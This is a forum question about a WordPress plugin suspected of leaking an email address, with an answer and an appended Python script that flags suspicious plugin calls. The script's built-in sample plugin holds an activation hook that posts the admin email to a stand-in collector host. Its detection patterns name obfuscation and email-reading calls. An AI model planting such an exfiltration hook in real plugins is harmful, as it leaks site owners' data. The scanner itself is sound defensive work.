0

After activating a plugin I received an email that I had never received before. What kind of miscellaneous code might it be? Is it a coincidence? I received an email to my Gmail account that I never used on my VPS (not sure) and I am sure that I never used it on the website where I activated a plugin. But I activated the plugin exactly at 1:03 and I received spam (with a PDF and a link inside the PDF) exactly at 1:03. I blocked using the root user years ago. I am using the admin user of VestaCP.

My question is: how can I scan a WordPress plugin for malware or miscellaneous code? I tried uploading the zip with the plugin to VirusTotal but nothing was found. I need some help before I reinstall my VPS and all my websites.
Thank you

phtshw

1 Answer

0

There are many WordPress plugins that offer malware scanning as part of their functionality, for example Wordfence.

I'd recommend trying to reproduce the issue with a unique email address in order to gain more certainty. Set up a fresh WordPress site, activate the plugin, and this time use the + suffix trick to create a unique email address like example+spamtest@gmail.com where your normal address is example@gmail.com. If you get a spam email to that unique email address, then you can be reasonably certain that the spam is correlated to entering the address into the plugin form.

sceox
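A first-pass static triage for the plugin review asked about here, as an added example that is not part of the original question or answer: it walks an unpacked plugin directory and flags lines that register an activation hook, send mail, make outbound HTTP requests, decode or evaluate strings, or read a stored email address. The pattern list, the function names and the sample plugin are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Calls worth reading by hand in a plugin suspected of mailing or phoning home.
# A hit is a lead for manual review, not proof of malice.
PATTERNS = {
    "activation-hook": re.compile(r"\bregister_activation_hook\s*\("),
    "sends-mail": re.compile(r"\b(?:wp_mail|mail)\s*\("),
    "outbound-http": re.compile(r"\b(?:wp_remote_(?:get|post|request)|curl_exec|fsockopen)\s*\("),
    "obfuscation": re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\("),
    "reads-email": re.compile(r"admin_email|user_email"),
}

def scan_plugin(root):
    """Return (relative_path, line_no, label, source_line) for every hit."""
    root, findings = Path(root), []
    for path in sorted(p for p in root.rglob("*.php") if p.is_file()):
        text = path.read_text(encoding="utf-8", errors="replace")
        for line_no, line in enumerate(text.splitlines(), 1):
            for label, rx in PATTERNS.items():
                if rx.search(line):
                    rel = path.relative_to(root).as_posix()
                    findings.append((rel, line_no, label, line.strip()))
    return findings

# Constructed sample plugin (hypothetical, not the plugin from the question).
SAMPLE = {
    "sample-plugin.php": "<?php\n"
        "register_activation_hook(__FILE__, 'sp_on_activate');\n"
        "function sp_on_activate() {\n"
        "    $to = get_option('admin_email');\n"
        "    wp_remote_post('https://collector.invalid/in', array('e' => $to));\n"
        "}\n",
    "includes/helpers.php": "<?php\nfunction sp_title() { return 'hello'; }\n",
}

def scan_sample():
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE.items():
            target = Path(tmp, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_plugin(tmp)

if __name__ == "__main__":
    for rel, line_no, label, src in scan_sample():
        print(f"{rel}:{line_no}: [{label}] {src}")
```

To check a real plugin, unzip it and call `scan_plugin()` on the extracted directory; legitimate plugins also use many of these calls, so read each flagged line in context.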